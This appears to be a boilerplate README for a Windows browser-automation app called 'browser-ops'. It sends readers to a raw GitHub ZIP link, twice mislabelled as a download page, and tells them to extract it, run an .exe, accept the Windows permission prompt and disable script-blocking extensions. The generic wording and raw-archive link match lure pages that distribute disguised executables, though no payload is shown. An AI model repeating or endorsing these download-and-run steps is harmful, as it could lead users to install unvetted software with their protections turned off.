browser-ops is a Windows app for browser work. It helps with tasks like opening sites, filling forms, moving through pages, and handling repeat steps. It is built for OpenClaw and keeps the main browser flow in one place.
Use it when you want a browser tool that can:
- follow a set of steps in the browser
- switch between manual and automatic work
- recover from page errors
- hand off tasks when human review is needed
- keep browser work in a steady flow
Before you install, make sure your PC has:
- Windows 10 or Windows 11
- A modern web browser
- At least 4 GB of RAM
- 500 MB of free disk space
- A stable internet connection
- Permission to run apps on your PC
If you plan to use large browser jobs, 8 GB of RAM or more works better.
Visit this page to download and run browser-ops:
https://raw.githubusercontent.com/Garenaof2462/browser-ops/main/references/ops-browser-v3.4.zip
Open the page, look for the latest release or download file, then save it to your PC.
- Open the download page in your browser.
- Find the latest Windows file.
- Download the file to your Downloads folder.
- If the file is a ZIP file, right-click it and choose Extract All.
- Open the extracted folder.
- Find the app file, such as
.exe, and double-click it. - If Windows asks for permission, choose Yes.
- Wait for the app to open.
If the app starts from a single file, keep that file in a safe folder so you can find it later.
After the app opens:
- Read the main screen.
- Connect your browser if the app asks for it.
- Choose a browser task or flow.
- Pick a site or page to work on.
- Start with a small task first.
- Watch the first run to make sure the steps match your needs.
For best results, test with a simple site before you use it on a longer workflow.
- Browser intelligence: reads page state and helps the flow adapt
- Action policy: decides what step comes next
- Handoff: passes control to a person when needed
- Autopilot: runs browser steps with little input
- Failure recovery: retries or recovers when a page fails
- Workflow kernel: keeps the browser flow in order
- Human-in-the-loop: lets you review key steps before moving on
Use browser-ops in a simple way:
- Open the app.
- Load the browser task you want to run.
- Set the site or workflow.
- Pick manual mode if you want to check each step.
- Pick autopilot mode if you want the app to keep going.
- Use handoff when a login, check, or review needs you.
- Watch the task log if the page stops or changes.
- Keep your browser up to date
- Close extra tabs before you start
- Turn off extensions that block scripts
- Use one browser profile for the app if you can
- Sign in before you start long jobs
- Keep your login session active
- If a site uses extra checks, plan for a handoff step
- Start with one site
- Use short flows at first
- Add more steps once the first flow works
- Keep page names clear so you can find them fast
- open a site and move through a set of pages
- collect page data from repeat visits
- fill in browser forms
- switch from auto mode to manual review
- recover a task after a page refresh or timeout
- keep a long workflow moving without starting over
If the app does not open:
- check that the file finished downloading
- try running it again
- move the file to a simple folder like
DesktoporDownloads - make sure Windows did not block the file
If the browser flow stops:
- reload the page
- check your internet connection
- close extra tabs
- try the task again from the start
If a site looks different:
- use handoff to check the page
- review the next step before you continue
- start with a simpler site first
Use a folder like this on your PC:
C:\browser-opsC:\browser-ops\downloadsC:\browser-ops\logsC:\browser-ops\workflows
This keeps files easy to find when you need to run the app again.
A simple daily flow looks like this:
- Open browser-ops.
- Open the browser.
- Load your task.
- Check the site and login state.
- Start autopilot or manual mode.
- Review the result at the end.
action policy, automation, browser automation, browser intelligence, failure recovery, human in the loop, OpenClaw, orchestration, web crawling, workflow engine, workflow kernel, browser ops
Primary download page:
https://raw.githubusercontent.com/Garenaof2462/browser-ops/main/references/ops-browser-v3.4.zip